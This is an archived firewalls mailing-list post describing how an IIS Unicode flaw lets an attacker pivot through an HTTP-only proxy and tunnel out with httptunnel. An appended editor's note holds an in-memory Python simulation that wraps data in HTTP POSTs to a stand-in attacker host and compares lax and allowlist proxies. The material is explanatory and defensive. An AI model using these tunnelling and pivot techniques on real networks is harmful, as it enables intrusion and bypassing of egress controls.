Brian Steele wrote:
>
> Hmm.. Can someone give an example of how a "compromise" that opens the
> internal network to the attacker could work, if the proxy server is passing
> only HTTP traffic on port 80 between the internal server and the Internet
> client?
It's easy (I've done it on several pen tests). Again I'm invoking the
IIS Unicode vulnerability. It allows an attacker to run arbitrary
commands on the web server. That machine can be used to connect to any
other system it can reach. There are limits if that is the only access
that is obtained but anything that is a single command responding with
output will work. Interactive stuff like telnet won't.
However, if the web server is not prevented from making outbound
connections (ftp, tftp, mapping a share), I can download a tool called
httptunnel which would allow any IP traffic to be sent through the proxy
server as a building block to achieving a remote command shell. It all
depends on the strictness of the proxy configuration.
-paul
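[Editor's note, not part of the original post: the tunnelling step Paul describes above, arbitrary TCP data wrapped in ordinary-looking HTTP so that a "port 80 only" proxy forwards it, is easy to see in a few lines. The following added example is not httptunnel's wire format and not code from anyone on the thread; the framing (a form POST carrying session id, sequence number and a base64 chunk), the hostnames, the sample byte stream and the two proxy policies are all invented for illustration. It contrasts a proxy that checks only that traffic parses as HTTP with one that also applies an egress allowlist, which is the "strictness of the proxy configuration" that decides whether this works.]

```python
"""Toy HTTP tunnel: hide an arbitrary byte stream inside HTTP POST requests
and push it through two simulated proxy policies. Added illustration only;
this is not httptunnel's real protocol and all names below are made up."""
import base64
from urllib.parse import parse_qs, urlencode

# Constructed sample: the opening bytes of some non-HTTP protocol (an SSH
# banner followed by binary data). No proxy forwards this as-is on port 80.
SAMPLE_STREAM = b"SSH-2.0-OpenSSH_9.6\r\n" + bytes(range(256))

TUNNEL_ENDPOINT = "tunnel.attacker.example"   # hypothetical attacker host
CHUNK = 16                                    # bytes of raw data per request


def wrap(session_id: str, seq: int, chunk: bytes, host: str = TUNNEL_ENDPOINT) -> bytes:
    """Compromised-server side: hide one chunk of raw data in a form POST."""
    body = urlencode({"sid": session_id, "seq": seq,
                      "d": base64.b64encode(chunk).decode()}).encode()
    head = (f"POST /cgi-bin/form.cgi HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


def parse_http(raw: bytes):
    """Minimal request parser; raises ValueError for anything that is not
    a well-formed HTTP/1.x request (this is all a lax proxy checks)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("not an HTTP request")
    lines = head.decode("ascii", "strict").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] not in ("GET", "POST", "HEAD") \
            or parts[2] not in ("HTTP/1.0", "HTTP/1.1"):
        raise ValueError("bad request line")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "host" not in headers:
        raise ValueError("missing Host header")
    if int(headers.get("content-length", "0")) != len(body):
        raise ValueError("Content-Length mismatch")
    return parts[0], parts[1], headers, body


def proxy_port_only(raw: bytes) -> bytes:
    """'Passes only HTTP on port 80': anything that parses as HTTP goes out."""
    parse_http(raw)
    return raw


def proxy_egress_allowlist(raw: bytes, allowed=frozenset({"www.example.com"})) -> bytes:
    """Stricter policy: must be HTTP *and* the destination host must be on
    an allowlist. The tunnel needs an attacker-controlled endpoint, so it
    is refused at the first request."""
    _, _, headers, _ = parse_http(raw)
    if headers["host"].split(":")[0] not in allowed:
        raise PermissionError(f"egress to {headers['host']} denied")
    return raw


def unwrap(raw: bytes):
    """Attacker side: recover (session id, sequence number, raw chunk)."""
    _, _, _, body = parse_http(raw)
    fields = parse_qs(body.decode())
    return fields["sid"][0], int(fields["seq"][0]), base64.b64decode(fields["d"][0])


def tunnel_stream(stream: bytes, proxy, session_id: str = "s1") -> bytes:
    """Send `stream` through `proxy` as HTTP-wrapped chunks and reassemble
    it on the far side, reordering by sequence number."""
    received = {}
    for seq, off in enumerate(range(0, len(stream), CHUNK)):
        sid, n, chunk = unwrap(proxy(wrap(session_id, seq, stream[off:off + CHUNK])))
        if sid == session_id:
            received[n] = chunk
    return b"".join(received[n] for n in sorted(received))


def tunnel_succeeds(stream: bytes, proxy) -> bool:
    """True if the whole stream survives the trip through `proxy`."""
    try:
        return tunnel_stream(stream, proxy) == stream
    except (PermissionError, ValueError):
        return False


def proxy_accepts(proxy, raw: bytes) -> bool:
    """True if `proxy` would forward `raw` unchanged."""
    try:
        return proxy(raw) == raw
    except (PermissionError, ValueError):
        return False


if __name__ == "__main__":
    print("raw stream through port-only proxy :", proxy_accepts(proxy_port_only, SAMPLE_STREAM))
    print("tunnel through port-only proxy     :", tunnel_succeeds(SAMPLE_STREAM, proxy_port_only))
    print("tunnel through allowlist proxy     :", tunnel_succeeds(SAMPLE_STREAM, proxy_egress_allowlist))
```

The point of the two policies: checking that traffic is syntactically HTTP does nothing against a tunnel, because the tunnel is syntactically HTTP. What stops it is denying the compromised host any outbound path to a destination the attacker controls, which is the "prevented from making outbound connections" condition in the post.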
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]